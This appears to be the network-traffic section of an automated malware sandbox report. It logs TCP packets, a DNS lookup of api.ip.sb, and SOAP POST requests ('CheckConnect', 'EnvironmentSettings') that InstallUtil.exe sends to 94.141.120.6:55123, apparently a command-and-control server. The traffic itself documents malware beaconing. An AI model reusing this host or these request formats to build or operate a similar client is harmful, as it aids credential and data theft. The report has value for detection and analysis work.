                                                            Nov 1, 2024 08:37:23.995827913 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.995841026 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.995851040 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.995858908 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.995866060 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.995882988 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.995912075 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.995912075 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.995927095 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.995939970 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.995949030 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.995965004 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.995968103 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.995974064 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.995984077 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.996023893 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.996026993 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996037960 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996087074 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.996098042 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996108055 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996117115 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996125937 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996159077 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996159077 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.996169090 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996179104 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996196985 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996201992 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.996231079 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996232033 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.996241093 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996248960 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.996278048 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.996300936 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.996376038 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996386051 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996393919 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996402979 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996412039 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996422052 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996429920 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.996431112 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996439934 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996454000 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.996479034 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.996495962 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.996505022 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996516943 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996525049 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996534109 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996567965 CET4975455123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:23.996570110 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996581078 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996602058 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996648073 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996709108 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996717930 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996727943 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996786118 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996794939 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996803045 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996820927 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996829987 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996905088 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996913910 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996948957 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996958017 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.996998072 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997005939 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997055054 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997066021 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997150898 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997160912 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997169018 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997178078 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997188091 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997195959 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997251987 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997320890 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997330904 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997338057 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997349024 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997400045 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997410059 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997416973 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997452974 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997462988 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997504950 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997514963 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997533083 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997543097 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997581959 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997643948 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997684956 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997694016 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997776031 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997785091 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997793913 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997802973 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997813940 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997823000 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997831106 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997840881 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997864962 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997874975 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997881889 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997890949 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997960091 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997968912 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997977972 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.997987032 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998018026 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998027086 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998034954 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998044968 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998053074 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998086929 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998095989 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998106003 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998178005 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998187065 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998253107 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998262882 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998270988 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998281956 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998300076 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998308897 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998356104 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998364925 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998403072 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998411894 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998456001 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998465061 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998473883 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998508930 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998517990 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998563051 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998572111 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998579979 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998641968 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998656988 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998665094 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998677015 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998693943 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998725891 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998759985 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998769045 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:23.998785973 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000324011 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000334978 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000343084 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000351906 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000360966 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000370026 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000380039 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000389099 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000399113 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000407934 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000416994 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000426054 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000433922 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000443935 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000452042 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000461102 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000466108 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000469923 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000473022 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000477076 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000480890 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000483990 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000487089 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000490904 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000497103 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000509977 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000531912 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000549078 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000632048 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000720024 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000729084 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000770092 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000780106 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000821114 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000829935 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000861883 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000870943 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000879049 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000911951 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000953913 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.000962973 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001033068 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001043081 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001506090 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001514912 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001554966 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001611948 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001646042 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001656055 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001666069 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001728058 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001737118 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001773119 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001782894 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001792908 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001847982 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001857042 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001898050 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001907110 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001949072 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001957893 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001972914 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.001981974 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002072096 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002080917 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002098083 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002105951 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002162933 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002171993 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002207994 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002217054 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002264977 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002274036 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002315998 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002325058 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002370119 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002378941 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002437115 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002445936 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002454996 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002465963 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002526999 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002536058 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002573013 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002583027 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002614021 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002624035 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002638102 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002646923 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002692938 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002701998 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002743959 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002753019 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002763033 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002811909 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002820969 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002867937 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002876997 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002885103 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002938986 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.002948999 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003046989 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003056049 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003065109 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003073931 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003091097 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003102064 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003189087 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003199100 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003206968 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003221989 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003231049 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003247023 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003254890 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003302097 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003319979 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003348112 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003356934 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003395081 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003432989 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003487110 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003496885 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003504038 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003515005 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003546000 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003554106 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003563881 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003616095 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003624916 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:24.003633976 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:33.992919922 CET551234975494.141.120.6192.168.2.5
                                                            Nov 1, 2024 08:37:34.012659073 CET4971255123192.168.2.594.141.120.6
                                                            Nov 1, 2024 08:37:34.013456106 CET4975455123192.168.2.594.141.120.6

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 1, 2024 08:37:07.806652069 CET6352553192.168.2.51.1.1.1

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 1, 2024 08:37:07.806652069 CET192.168.2.51.1.1.10x5fd4Standard query (0)api.ip.sbA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 1, 2024 08:37:07.813796997 CET1.1.1.1192.168.2.50x5fd4No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • 94.141.120.6:55123

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.54970494.141.120.6551235652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 1, 2024 08:37:00.716768026 CET239OUTPOST / HTTP/1.1
                                                            Content-Type: text/xml; charset=utf-8
                                                            SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                            Host: 94.141.120.6:55123
                                                            Content-Length: 137
                                                            Expect: 100-continue
                                                            Accept-Encoding: gzip, deflate
                                                            Connection: Keep-Alive
                                                            Nov 1, 2024 08:37:02.174566984 CET359INHTTP/1.1 200 OK
                                                            Content-Length: 212
                                                            Content-Type: text/xml; charset=utf-8
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 01 Nov 2024 15:37:01 GMT
                                                            Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                            Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                            Nov 1, 2024 08:37:07.270844936 CET222OUTPOST / HTTP/1.1
                                                            Content-Type: text/xml; charset=utf-8
                                                            SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                            Host: 94.141.120.6:55123
                                                            Content-Length: 144
                                                            Expect: 100-continue
                                                            Accept-Encoding: gzip, deflate
                                                            Nov 1, 2024 08:37:07.761944056 CET1236INHTTP/1.1 200 OK
                                                            Content-Length: 4744
                                                            Content-Type: text/xml; charset=utf-8
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 01 Nov 2024 15:37:07 GMT
